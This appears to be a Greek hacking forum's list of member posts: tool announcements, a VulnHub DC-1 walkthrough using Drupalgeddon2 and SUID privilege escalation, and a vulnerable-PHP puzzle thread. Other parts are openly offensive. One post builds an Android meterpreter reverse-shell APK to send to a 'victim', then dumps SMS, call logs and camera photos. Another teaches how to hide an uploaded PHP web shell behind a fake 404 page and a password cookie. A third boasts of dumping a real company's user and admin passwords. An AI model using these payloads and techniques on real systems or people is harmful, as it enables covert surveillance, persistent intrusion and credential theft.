  15. Καλημέρα / καλησπέρα φόρουμ. Άλλο ένα νέο προγραμματάκι από εμένα και αυτήν την φορά ένα Admin Panel finder. Πάμε να δούμε πληροφορίες. Ή μάλλον πρίν δούμε, θα σας δείξω ότι δεν περιέχει κάτι κακόβουλο εσωτερικά για να μην έχετε και το άγχος. \ Τώρα που το τσεκάραμε και αυτό πάμε να δούμε το πρόγραμμα. Αρχικά το έφτιαξα αρκετά απλό όπως και τα προηγούμενα. Απλά το ανοίγετε, γράφετε το url και γίνεται το Scan. Πάμε να δούμε Εδώ βλέπουμε ότι έχω βάλει το url (κρυμμένο) και μας ενημερώνει το πρόγραμμα τι ώρα άρχισε το scan. Αμέσως μετά αρχίζει να τρέχει ένα Wordlist το οποίο εννοείται πως μπορείτε να το επεξεργαστείτε και να βάλετε και εσείς μέσα ότι θέλετε και εννοείται πως για να ξεχωρίζουμε το σωστό το οποίο μας δίνει status 200 το έχω βάλει με πράσινα και [+]... Και αυτά που είναι error 404 τα έχω βάλει με κόκκινα και [-]... Στο τέλος επίσης σας ενημερώνει τι ώρα τελείωσε το scan. Τώρα θέλω να σας πω λίγο για τα Requirements. 1.) Πρέπει αναγκαστικά να έχετε την τρίτη έκδοση της Python. Δηλαδή όχι python2 αλλά python3. 2.) Με το που ανοίξετε τον φάκελο με το πρόγραμμα, θα κατεβάσετε το requirements.txt γράφοντας την εντολή " pip install requirements.txt ". Αν έχετε κάποιο πρόβλημα γενικά με το πρόγραμμα παρακαλώ ενημερώστε με για να φτιαχτεί. Ευχαριστώ GitHub: https://github.com/MataGreek/GHADM
  16. ΠΡΟΣΟΧΗ! ΤΟ ΠΡΟΓΡΑΜΜΑ ΠΡΟΣ ΤΟ ΠΑΡΟΝ ΤΡΕΧΕΙ ΜΟΝΟ ΣΕ WINDOWS Καλησπέρα φόρουμ. Σήμερα έφτιαξα ένα νέο προγραμματάκι το οποίο είναι αρκετά χρήσιμο για τον κόσμο του Hacking. Γιατί είναι αρκετά χρήσιμο; Διότι μπορεί να σκανάρει και να βρει Subdomains μίας ιστοσελίδας. Είναι αρκετά σημαντικό να βρίσκουμε τα Subdomains μιας ιστοσελίδας όταν θέλουμε να "χακάρουμε" κάτι διότι παίρνουμε περισσότερες πληροφορίες ή πολύ απλά μπορεί αυτό το Subdomain να έχει μία παραπάνω ευπάθεια. Μπορείτε αυτά να τα διαβάσετε και σε οδηγούς του φόρουμ Πάμε να δούμε την χρήση του προγράμματος και επίσης να κάνουμε ένα scan για το αν έχει ιο το πρόγραμμά μου. Ωραία αφού είδαμε ότι προφανώς το πρόγραμμα δεν έχει κάποιο trojan ή ransomware ή άλλους τύπους ιών (Αυτό έλλειπε να σας πετάξω και ιο) Πάμε να προχωρήσουμε παρακάτω, στην χρήση του. Η χρήση λοιπόν είναι ΠΑΡΑ πολύ απλή. Πάμε να δούμε USAGE ######## open cmd cd {path} cd windows pip install -r requirements python ghsubfinder ########################## Να προσθέσω ότι μέσα στον φάκελο υπάρχει και ένα wordlist το οποίο μπορείτε να το επεξεργαστείτε και να βάλετε κι άλλα subdomains αν χρειαστεί. Github: https://github.com/MataGreek/ghsubfinder Mediafire: https://www.mediafire.com/file/04j8b5dx070kj8x/subdomain_finder.rar/file
  17. Πήρα την απόφαση, να αρχίσω να ανεβάζω νέους οδηγούς σχετικά με το Hack The Box, αφού πρώτα απ' όλα είναι νόμιμο, είναι ενδιαφέρον αλλά ταυτόχρονα μαθαίνεις μέσα από αυτό. Όσοι δεν γνωρίζετε το HTB είναι μία κοινότητα, ίσως η μεγαλύτερη στον κόσμο ή αν όχι η μεγαλύτερη, μία από τις μεγαλύτερες, η οποία σου παρέχει κάποια δωρεάν Machines έτσι ώστε να εξασκηθείς και να προσπαθείς να τα "σπάσεις". Πιστέψτε με είναι αρκετά ενδιαφέρον και αξίζει να κάνετε Εγγραφή εκεί. Αν θέλετε να κάνετε εγγραφή πατήστε εδώ: https://app.hackthebox.eu/ Αυτό που θα κάνω εγώ λοιπόν, είναι να σας βγάζω οδηγούς εδώ στο ΠΩΣ θα γίνει pwned ένα μηχάνιμα. Ίσως σκεφτώ να φτιάξω και στο YouTube κάτι αλλά βίντεο με κάμερα κτλ. Θα δω Enjoy your ethical hacking
  18. Το Greek Hacker MD5 HASH CRACKER είναι ένα πρόγραμμα αποκρυπτογράφησης, δημιουργήθηκε για νόμιμες ενέργειες και η ομάδα του Greek Hacking δεν φέρει καμία ευθύνη για το πως θα το χρησιμοποιήσετε. Πριν αρχίσουμε να αναφέρω πως έχει δύο εκδόσεις. Μία για Windows και μία για Linux και αυτός είναι και ο σκοπός των δύο φακέλων που θα δείτε στο Github. Όσοι έχετε Windows μπείτε στον φάκελο windows και όσοι Linux στον φάκελο Linux. Και που ξέρουμε αν τα προγράμματα που φτιάχνεις και μας δίνεις δεν έχουν ιούς; Καλή ερώτηση και πολύ εύκολη να απαντηθεί. Πρώτον δεν έχω κανέναν σκοπό να βλάψω καμία μηχανή και κανένα σύστημα, δεύτερον υπάρχει το VirusTotal που θα βάλω screenshot από κάτω, και τρίτο και σημαντικότερο... Μόνο ηθικό hacking. Ας αρχίσουμε. VIRUS TOTAL SCREENSHOT ----------------------------------------- PROGRAM SCREENSHOTS ----------------------------------------- Πρώτα απ' όλα ας αρχίσουμε με το τι βλέπουμε με το που κατεβάσουμε το πρόγραμμα. Έχω χωρίσει 3 φακέλους (Windows, Linux, Wordlist). Τους πρώτους δύο τους αναλύσαμε πιο πάνω. Στον φάκελο Wordlist υπάρχει μία ΜΙΚΡΗ wordlist προς το παρόν που έφτιαξα για εσάς, για να μην κατεβάζετε αν δεν έχετε ή για να μην γράφετε εσείς. INSTALL Η εγκατάσταση δεν είναι τίποτα άλλο παρα μόνο να γράψετε αυτήν την εντολή: pip install -r requirements.txt Με αυτήν την εντολή θα κατεβάσετε όλα τα προαπαιτούμενα για να ανοίξει το πρόγραμμα. Αμέσως μετά θα μπείτε στον φάκελο Linux ή Windows και θα ανοίξετε το πρόγραμμα γράφοντας: python3 ghmd5cracker.py USAGE Αφού το ανοίξετε θα σας πει να βάλετε το path του wordlist. Οπότε βάζετε το path χωρίς να βάλετε σύμβολα όπως, "" ή '' Όταν βάλετε σωστά το path θα πρέπει να βάλετε το md5 hash που θέλετε να αποκρυπτογραφήσετε. Μετά το πρόγραμμα θα ψάχνει από μόνο του για να αποκρυπτογραφήσει τον κωδικό. Ευχαριστώ Download ==> https://github.com/MataGreek/GH-MD5-CRACKER git clone https://github.com/MataGreek/GH-MD5-CRACKER.git Αν θέλετε να στηρίξετε την δουλειά μου παρακαλώ κάντε ένα Donate εδώ: https://www.paypal.com/paypalme/vbourant
  19. Φόρουμ, σήμερα για άλλη μια φορά έγινα χαρούμενος μετά από μια «καλή» θεωρώ πράξη, διότι βρήκα κενό ασφαλείας σε μία ελληνική εταιρία, πήρα πρόσβαση σε όλα αλλά επέλεξα να στείλω Email και να αναφέρω ότι υπάρχει το κενό έτσι ώστε να το καλύψουν. Δεν υπάρχει λόγος που βγάζω αυτήν την ανάρτηση απλά θέλω να το μοιραστώ μαζί σας και ελπίζω να σκέφτεστε σωστά την κάθε σας κίνηση. (Θα μπορούσα να μην είχα μπει στην βάση, απλά ήθελα να δω αν θα τα κάνει dump έτσι όπως ήθελα και αυτό και έγινε) Η πρώτη εικόνα είναι emails, real names, usernames και passwords από users Η δεύτερη εικόνα είναι real names, usernames και passwords από τους admin Και η τρίτη εικόνα είναι το Email που αναφέρω το κενό ασφαλείας
  20. Σε αυτό το άρθρο, θα μάθουμε πως να χακάρουμε μια συσκευή android και πως να την κάνουμε exploit όπως επιθυμούμε. Το android είναι ένα λειτουργικό σύστημα βασισμένο στον πυρήνα του Linux. Χρησιμοποιεί τύπο αρχείου APK για την εγκατάσταση εφαρμογών. Έτσι, το malware μας πρέπει να είναι επίσης σε APK. Για να το φτιάξουμε θα εκτελέσουμε την παρακάτω εντολή για msfvenom: [hide] msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 > shell.apk Αφού φτιαχτεί το malware θα ξεκινήσουμε ένα handler για να πάρουμε session με την εντολή: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.1.109 set lport 1234 exploit Όταν τρέξει το exploit στείλε το αρχείο APK στο θύμα και σιγουρευτείτε πως θα το τρέξουν στο κινητό τους. Όταν το αρχείο αυτό τρέξει τότε θα πάρετε session όπως φαίνεται στην παρακάτω εικόνα: Τώρα, υπάρχουν πολλές εντολές για παραπάνω exploitation την συσκευή του χρήστη. Θα σας δείξουμε στην παρακάτω εικόνα μερικά από τα πιο πρακτικά. Μπορείτε να δείτε αν η συσκευή είναι rooted με την παρακάτω εντολή: check_root Μπορείτε επίσης να κάνετε dump όλα τα call-logs σε κάποιο αρχείο με την εντολή: dump_calllog Η οποία θα φτιάξει ένα αρχείο TXT με την λεπτομερές λίστα των call logs του θύματος. Εκτελέστε την παρακάτω εντολή για να την διαβάσετε: cat <όνομα_αρχείου_txt> Μπορείτε επίσης να στείλετε και όλων των ειδών SMS από την συσκευή με την εντολή: send_sms -d <αριθμός_παραλήπτη> -t <κείμενο> Μπορείτε να τραβήξετε φωτογραφία από την κάμερα με την εντολή: webcam_snap η οποία τα αποθηκεύση την φωτογραφία σε αρχείο JPEG Για να κάνετε dump τα SMS τρέξτε την εντολή: dump_sms Όπως και με τα call logs, μπορείτε να διαβάσετε το αρχείο με την εντολή cat (δείτε την εικόνα από κάτω:) Με αυτόν τον τρόπο μπορείτε να κάνετε exploit την συσκευή όπως θέλετε. [/hide]
  21. Καλησπέρα, αυτός είναι ο πρώτος μου οδηγός από τους πολλούς που θα ακολουθήσουν, θα μου επιτρέψετε να πω δύο λόγια αρχικά. Βλέπω υπάρχουν άτομα στο forum που θέλουν να μάθουν άλλα δεν υπάρχει ενδιαφέρον όσο αφορά τους οδηγούς. Υπήρξα κι εγώ στην θέση τους και καταλαβαίνω πως είναι, ευτυχώς η δυστυχώς το hacking στην Ελλάδα δεν είναι τόσο ενεργό. Τι θέλω να πω με αυτό, στην Ελλάδα έχουμε πολλούς κάλους hackers αλλά δεν υπάρχει ενδιαφέρον όσο αφορά το κομμάτι των tutorials/guides κτλπ. Στο forum έχουμε κάλους οδηγούς που δημιούργησαν παλιότερα άλλα μέλη (gcoder, admin etc). 99,9% των tutorial/βιβλίων είναι στα αγγλικά, tutorial & βιβλία που πραγματικά αξίζουν τoν κόπο και σου μαθαίνουν κάτι ουσιαστικό, όχι για παράδειγμα πως να "hackareis" το facebook,twitter,email της γκόμενα σου και δεν συμμαζεύεται. Από μεριά μου θα προσπαθήσω να ανεβάζω καθημερινά οδηγούς όσο μου επιτρέπει και το ωράριο μου, έστω και ένας να θέλει να ασχοληθεί πραγματικά, χαλάλι ο χρόνος μου. Σαν ιδεολογία έχω ότι το CTF είναι ο καλύτερος τρόπος να μάθεις hacking. Για αυτούς που δεν γνωρίζουν CTF (Capture the Flag) είναι διαγωνισμοί πάνω στο hacking. Είτε σε challenges όπως (crypto, stego, pwn, forensics etc) είτε με το να πάρεις πρόσβαση σε έναν ολόκληρο server (attack-defence) αυτό που θα δούμε σήμερα. Οπότε όπως καταλαβαίνετε οι οδηγοί μου κυρίως θα αφορούν αυτό το κομμάτι. Όσοι ασχοληθείτε να είστε σίγουρη ότι θα μάθετε πολλά. Ένα από τα πολλά CTF που κυκλοφορούν είναι το vulnhub, από τα κορυφαία. Περιεχόμενα : Τι είναι το vulnhub. VM Setup(VMWare). Enumeration. Exploitation. Privilege Escalation. Links. Τι είναι το vulnhub ? [hide] Το vulnhub είναι μια πλατφόρμα που hackers ανεβάζουν vulnerable μηχανήματα (99% Linux διότι τα Windows έχουν license problems δυστυχώς). Τα κατεβάζουμε & τα κάνουμε setup τοπικά και σκοπός μας είναι να πάρουμε δικαιώματα διαχειριστή. Τα περισσότερα από αυτά είναι real-world-examples δηλαδή αληθινά παραδείγματα. web exploitation, binary exploitation, cryptography κτλπ. Σήμερα θα ξεκινήσουμε την σειρά DC από το vulnhub, που έχουν να κάνουν με web hacking. Είναι ιδανικά για αρχάριους και κυρίως για CMS hacking. Μια συμβουλή μην διαβάζετε απλά τον οδηγό, διότι δεν θα μάθετε τίποτα το πολύ σε μια εβδομάδα θα τα έχετε ξεχάσει. Ασχοληθείτε, πειραματιστείτε. VM Setup (VMWare) Κατεβάστε το VM : https://www.vulnhub.com/entry/dc-1,292/ Όταν κατέβει το VM κάντε το extract στο Desktop και ανοίξτε το .ova αρχείο. Πατήστε import, άμα σας εμφανίσει ένα failed msg πατήστε retry. Έπειτα πατήστε "Power on this vitrual machine" και είμαστε έτοιμοι να ξεκινήσουμε. Enumeration Πρώτο βήμα πάντα είναι να πάρουμε την IP του "θύματος", εγώ χρησιμοποιώ το arp-scan. Μπορείτε να το κάνετε install : sudo apt-get install arp-scan Και : arp-scan --localnet | grep VMware 192.168.1.11 00:0c:29:17:8c:dd VMware, Inc. Αμέσως επόμενο βήμα το nmap, να δούμε για ανοιχτές πόρτες στο θύμα / services κτλπ. nmap -sC -sV -p- 192.168.1.11 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-28 01:58 EET Nmap scan report for dc-1.zte.com.cn (192.168.1.11) Host is up (0.000072s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) |_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.2.22 (Debian) |_http-title: Welcome to Drupal Site | Drupal Site 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 33058/udp6 status | 100024 1 36404/udp status | 100024 1 38099/tcp status |_ 100024 1 58322/tcp6 status 38099/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:17:8C:DD (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.49 seconds -sC : default scripts -sV : version scan -p- : όλα τα ports (1-65535) Όποτε έχουμε 22,80,111. Το 80 είναι το entry point, από εκεί θα πάρουμε πρόσβαση στο σύστημα. To nmap μας λέει τρέχει drupal 7, ας το κάνουμε verify με το droopescan. Μπορείτε να το κάνετε install : pip install droopescan Και : droopescan scan drupal -u http://192.168.1.11/ [+] Themes found: seven http://192.168.1.11/themes/seven/ garland http://192.168.1.11/themes/garland/ [+] Possible interesting urls found: Default admin - http://192.168.1.11/user/login [+] Possible version(s): 7.22 7.23 7.24 7.25 7.26 [+] Plugins found: ctools http://192.168.1.11/sites/all/modules/ctools/ http://192.168.1.11/sites/all/modules/ctools/LICENSE.txt http://192.168.1.11/sites/all/modules/ctools/API.txt views http://192.168.1.11/sites/all/modules/views/ http://192.168.1.11/sites/all/modules/views/README.txt http://192.168.1.11/sites/all/modules/views/LICENSE.txt image http://192.168.1.11/modules/image/ profile http://192.168.1.11/modules/profile/ php http://192.168.1.11/modules/php/ [+] Scan finished (0:06:51.768347 elapsed) Αυτό που μας ενδιαφέρει είναι η version, θα ψάξουμε για vulnerabilities πάνω σε αυτή την version. searchsploit drupal 7 ------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------------- Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | exploits/php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | exploits/php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | exploit Το γνωστό Drupalgeddon μπορεί να μας δώσει shell, μπορούμε να το κάνουμε manual η με ένα py exploit αλλά και με το metasploit, μπορείτε να πειραματιστείτε και μόνοι σας Για λόγου χρόνου θα πάμε με το metasploit. Exploitation Ξεκινάμε το metasploit : service postgresql start; msfconsole Ψάχνουμε για το exploit : msf5 > search name:Drupalgeddon type:exploit Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > Βάζουμε την IP του θύματος & πατάμε exploit. msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.1.11 RHOSTS => 192.168.1.11 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit [*] Started reverse TCP handler on 192.168.1.14:4444 [*] Sending stage (38247 bytes) to 192.168.1.11 [*] Meterpreter session 1 opened (192.168.1.14:4444 -> 192.168.1.11:56249) at 2019-10-28 02:19:56 +0200 meterpreter > Perfect! Ας πάρουμε shell & tty δηλαδή ένα πιο "καλό" shell με απλά λόγια. meterpreter > shell Process 3380 created. Channel 0 created. python -c 'import pty; pty.spawn("/bin/bash")' www-data@DC-1:/var/www$ whoami whoami www-data www-data@DC-1:/var/www$ Είμαστε σαν www-data (www-data είναι ο χρήστης που οι web servers π.χ (apache, nginx etc) χρησιμοποιούν από default). Ας πάρουμε δικαιώματα διαχειριστή. Privilege Escalation Ο πιο κλασσικός τρόπος στα CTF είναι τα SUID αρχεία, θα σας έχω link παρακάτω να καταλάβετε πως λειτουργούν. Ας ψάξουμε για root SUID αρχεία. (root = administrator) www-data@DC-1:/var/www$ find / -uid 0 -perm -4000 -type f 2>/dev/null find / -uid 0 -perm -4000 -type f 2>/dev/null /bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/procmail /usr/bin/find /usr/sbin/exim4 /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /sbin/mount.nfs www-data@DC-1:/var/www$ Το find φαίνεται exploitable. www-data@DC-1:/var/www$ find . -exec /bin/sh \; -quit find . -exec /bin/sh \; -quit # whoami; id whoami; id root uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data) # Έχουμε δικαιώματα διαχειριστή, δεν εξηγώ πολλά πράγματα θα σας έχω link από κάτω να μελετήσετε μόνοι σας γιατί το post θα βγει πολύ μεγάλο. Τα λέμε ξανά στο DC2 σύντομα, για οποιαδήποτε απορία στείλτε μου DM ή σχολιάστε από κάτω. Links droopescan : https://github.com/droope/droopescan find exploit : https://gtfobins.github.io/ linux priv esc : https://www.rebootuser.com/?p=1623 searchsploit : https://www.exploit-db.com/searchsploit SUID : https://www.linuxnix.com/suid-set-suid-linuxunix/ [/hide]
  22. Στο παρακάτω site θα βρείτε πολλά βιβλία για hacking και προγραμματισμό Οι κατηγωρίες των βιβλίων ειναι οι εξείς: Cyber_Security & Hacking Networking Linux Android SEO Python C++ Java Web_Design HTML5 CSS PHP Wordpress Joomla Oracle Magento Microsoft Visual_Basic Matlab http://freepdf-books.com/
  23. Πολλοί θέλουν να μάθουν hacking χωρίς να ξέρουν τα βασικά πράγματα πάνω στην ιδεολογία του συγκεκριμένου τομέα. Σε αυτό το θέμα θα πω δύο λόγια για την ιδεολογία του hacking, θα προσπαθήσω να είμαι όσο ποιο πολύ κατανοητός μπορώ να είμαι. Αρχικά θα πρέπει να σας πω ότι το hacking δεν είναι το ίδιο με το hacktivism και το penetration testing. Αυτά είναι 3 διαφορετικά πράγματα. Μπορεί το hacking να περιέχει μέσα τα άλλα δύο αλλά το αντίθετό δεν γίνετε. Δεν θα επεκταθώ σε αυτό όμως. Η βασική αρχή του hacking βασίζεται στην ελευθερία του λόγου και το μοίρασμα της γνώσεις ώστε να αναπτυχθεί ολόκληρος ο κόσμος. Η δημιουργία τον linux είχε αυτό το σκεπτικό. Ο παραπάνω είναι ο λόγος της υπάρξεις τους. Θα τονίσω ότι δεν είναι το ίδιο με τον κομουνισμό. Η βασική διαφορά τους είναι ότι ο κομουνισμός σε αναγκάζει να μοιραστής κάτι ενώ το hacking απλά στο επιτρέπει. Θα δείτε πόλους χακερς να αναπτύσσουν πράγματα ανοικτού κώδικα, πολλές φορές χωρίς να έχουν κάποιο ιδιαίτερό κέρδος τα άτομα που το έφτιαξαν. Επίσης το hacking είναι μια συνεχής αναζήτηση γνώσεων. Υπάρχουν κάποιοι κανόνες στο hacking. Κάτι σαν κώδικας. Η αλήθεια είναι ότι όταν το πρώτο διάβασα μου φάνηκε αστείο και ίσως ήταν. Αλλά χρόνια αργότερα κατάλαβα ότι είναι πράγματα που κάνεις είτε το θες είτε όχι γιατί δεν μπορείς να τα αποφύγεις. Αν τα αποφύγεις συνήθως υπάρχουν κακές συνέπειες για εσένα. [hide] Όλες οι πληροφορίες πρέπει να είναι ελεύθερες. Πόλοι παρεξηγούνται με αυτόν τον κανόνα. Ναι σημαίνει ότι πρέπει να είναι όλα ελευθέρα αλλά δεν σημαίνει ότι όλα πρέπει να είναι και τσάμπα ή ότι εσύ πρέπει να δώσεις πληροφορίες σε κάποιον επειδή στο ζητάει και υπάρχει αυτός ο κανόνας. Με απλά λόγια λέει ότι πρέπει να έχουμε την δυνατότητα να μοιραζόμαστε πράγματα όταν το θέλουμε. Σε πολλά συστήματα δεν επιτρέπετε αυτό (βλέπε windows). Επίσης σημαίνει ότι όλοι πρέπει να έχουν πρόσβαση στην μάθηση και στους υπολογιστές/internet και άλλες πηγές γνώσεις. Λήψη εμπιστοσύνης στην εξουσία. Για να είναι κάτι πραγματικά ανοικτό τότε πρέπει να αναπτυχθεί και να συνεχίσει να αναπτύσσετε από όλους. Όχι μόνο μια επιχείρηση. Δεν μετράνε τα χαρτιά. Κρίνεσαι από τις γνώσεις και τις ικανότητες σου και όχι από τα πτυχία σου. Κάτι που συμβαίνει σπάνια πλέον. Δημιουργία. Μπορείς να φτιάξεις πράγματα που θα βοηθήσουν κόσμο με έναν υπολογιστή. Οι υπολογιστές μπορούν να κάνουν τον κόσμο καλύτερο. [/hide]
  24. Ένα απλό παιχνίδι που μπορούμε να παίξουμε και να μάθουμε για το hacking. Σε αυτό το θέμα θα ποστάρουμε κάποιον κώδικα ο οποίος είναι ευάλωτος σε κάποιο κενό ασφαλείας. ο Επόμενος που θα τον δει θα πρέπει να βρει το κενό ασφαλείας και να γράψει γιατί είναι λάθος και πως θα μπορούσε να το εκμεταλλευτεί κάποιος. Αυτός που έβαλε τον κώδικα θα πρέπει να δει τη έκανε ο άλλος που περίγραψε πως λειτουργεί και exploitarete το κενό, και αν είναι σωστός ή αν είναι αυτό που έχει στο κεφάλι του, τότε του δίνει <<άδεια>> να ανεβάσει νέο κώδικα ο όποιος είναι ευάλωτος για να τον τεστάρουν τα άτομα του φόρουμ. (μπορεί να υπάρχουν πάνω από 1 κενά σε κάποιον κώδικα και αυτός που έφτιαξε τον κώδικα να μην τα γνωρίζει όλα... για αυτό πρέπει να δώσει την <<άδεια>> στον άλλον για να ανέβει νέος κώδικας. Για να εξαντληθούν όλα τα κενά) Κανόνες: [hide] 1)Δεν βάζω κώδικα πάνω από 50 γραμμές. 2)Η απάντηση σας πρέπει να είναι μέσα σε spoiler γιατί μπορεί να θέλουν και άλλα άτομα να το προσπαθήσουν μόνοι τους (το μάτι στο πάνω menu στο όποιο μπορούμε να αλλάξουμε το μέγεθος για τα γράμματα... αν πάτε πάνω το βελάκι σας κάποιο λέει spiler.) 3)Αν προσπαθήσουν το λιγότερο τρία άτομα μέσα σε μια βδομάδα και δεν έχει βρεθεί λύση θα πρέπει αυτός που έβαλε τον κώδικα να πει και τι πρόβλημα υπάρχει και πως μπορεί να το εκμεταλλευτεί κάποιος.(πρέπει να προσπαθούν για μια βδομάδα και να υπάρχουν τουλάχιστον τρία άτομα που να έχουν ποστάρει ότι προσπάθησαν και δεν τα κατάφεραν) 4)Αν κάποιος προσπαθήσει πάνω από 45 λεπτά θα πρέπει να ποστάρι ότι έχει προσπαθήσει και επέτυχε (για τον παραπάνω κανόνα αυτό) 5)Αν μέσα σε δύο βδομάδες η κατάσταση είναι σε φάση: Άκρα του τάφου σιωπή. Αυτός που έβαλε τον κώδικα θα γράψει που ήταν το πρόβλημα. Όποιος προλάβει βάζει νέο κώδικα για να συνεχιστεί το παιχνίδι. Ξεκινάω εγώ με κάποιον php κώδικα. <?php $path = "gallery/".$_GET['page']; echo readfile($path); ?> [/hide]
  25. Γεια σας! Σήμερα θα σας δείξω μερικά βήματα έτσι ώστε να κάνετε (σχεδόν) αόρατο το shell σας που πιθανώς έχετε ανεβάσει κάπου![hide]1. Κάνουμε rename το shell μας σε μορφή .onoma.php πχ αν ήταν: shell.php το κάνουμε .shell.php έτσι ώστε να μην εμφανίζεται με την εντολή ls σκέτη. 2. Λοιπόν εδώ θεωρούμε 2 κωδικούς τους οποίους ξέρουμε μόνο εμείς. Εγώ θα χρησιμοποιήσω τους κωδικούς: pass1 και pass2 Ανοίγουμε το php shell μας και ορίζουμε τις μεταβλητές με τον κωδικό μας πάνω πάνω: $p1 = "pass1"; $p2 = "pass2"; Στο shell αν δεν είναι της μορφής server.com/.shell.php?pass1=pass2 θα πετάει 404 error έτσι ώστε να μην καταλάβει κανείς τίποτα..δηλαδή αν πάει να μπει κάποιος έτσι: server.com/shell.php θα του πετάξει 404 error.Αυτό θα γίνει μέσω php, πάμε και γράφουμε λίγο php κώδικα: if($_GET['p1'] == $p1 && $_GET['p2'] == $p2) { //Kwdikas tou shell edw } else { //Edw einai o kwdikas gia to 404 Not Found?> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?echo $_SERVER['SCRIPT_NAME']?> was not found on this server.</p> <hr> <address>Apache/2.4.7 (Ubuntu) Server at localhost Port 80</address> </body></html> <?}?> Επειδή όμως σε μερικά shell ίσως να μην υπάρχει ομαλή λειτουργία(μπορεί όταν πατάνε πχ το κουμπί για την επεξεργασία ή προβολή αρχείου να <<βγαίνει>> το &p1=pass1&p2=pass2 απ το λινκ μας(δηλαδη η ταυτοποιηση του κωδικου μας) με αποτέλεσμα να μας πετάει πάλι στο 404 Not Found, θα προστέσουμε λίγο ακόμα κώδικα έτσι ώστε να μπαίνουν σε cookie οι κωδικοί και να μην ξαναχρειαστεί να τους βάλουμε στο link.Έτσι λοιπόν προσθέτουμε μετά το if($_GET['p1'] == $p1 && $_GET['p2'] == $p2) { τον εξής κώδικα: if($_COOKIE['p1'] != $p1) { //Dhladh an o xrhsths auth thn stigmh exei tous kwdikous sto link kai oxi se cookie setcookie("p1",$_GET['p1'], time() + (10 * 365 * 24 * 60 * 60)); setcookie("p2",$_GET['p2'], time() + (10 * 365 * 24 * 60 * 60)); }και ύστερα κάνουμε μια τροποποίηση στην if() έτσι ώστε να ελέγχει για cookie εναλλακτικά(αν δεν υπάρχουν οι κωδικοί στο link): if(($_GET['p1'] == $p1 && $_GET['p2'] == $p2) || ($_COOKIE['p1'] == $p1 && $_COOKIE['p2'] == $p2)) { και τέλος!Ας κάνουμε έναν έλεγχο.. Link: .madspot.php: 404 error και λογικό αφού δεν έχουμε βάλει κωδικο.. Link: .madspot.php?p1=pass1&p2=pass2 Τώρα αφού βάλαμε τους κωδικούς φόρτωσε το shell και ταυτόχρονα πέρασε τους κωδικούς μας σε cookie, πάμε να δοκιμάσουμε πάλι σκέτο link: Link: .madspot.php(μετά απ' το όρισμα των κωδικών): Τώρα βλέπουμε πως λειτουργεί κανονικά αφού έχουν οριστεί σε cookie οι κωδικοί μας και δεν χρειάζεται πλέον να τους βάζουμε στο link. Screenshot από τον server εκτελόντας την εντολή ls: Όπως βλέπετε με την εντολή ls σκέτη δεν εμφανίζεται το shell αφού ξεκινάει από . (κρυφό αρχείο) Αυτό ήταν! Αν σας μπέρδεψα μπορείτε να κατεβάσετε μια έτοιμη τροποποίηση που έκανα στο Madspot Shell: http://www.mediafire.com/download/dcgj5eh360rg3s4/modified_madspot_kwnos100.rar [/hide]Η μέθοδος είναι δικιά μου και ανήκει στο GreekHacking.com Ότι απορία έχετε αφήστε σχόλιο

ChatBox

ChatBox

Chatroom Rules

  • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
  • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
  • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
  • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
×
×
  • Create New...